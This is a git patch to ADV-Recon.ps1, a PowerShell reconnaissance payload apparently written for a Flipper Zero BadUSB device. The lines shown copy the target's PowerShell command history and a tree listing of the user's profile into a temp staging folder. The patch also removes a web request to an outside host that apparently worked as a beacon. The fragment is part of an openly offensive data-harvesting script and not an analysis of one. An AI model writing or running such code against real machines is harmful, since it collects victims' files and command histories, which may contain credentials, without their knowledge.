From 78aea8e8daaa40c8bce9bb99b88fa5f3bd185b6a Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Tue, 13 Jun 2023 21:47:13 -0500 Subject: [PATCH] Update ADV-Recon.ps1 --- Payloads/Flip-ADV-Recon/ADV-Recon.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 index 84a45e0..4743950 100644 --- a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 +++ b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 @@ -57,7 +57,7 @@ tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt # Powershell history Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt -iwr "https://jakoby.lol/hak5" -EA 0 >$null + ############################################################################################################################################################ function Get-fullName {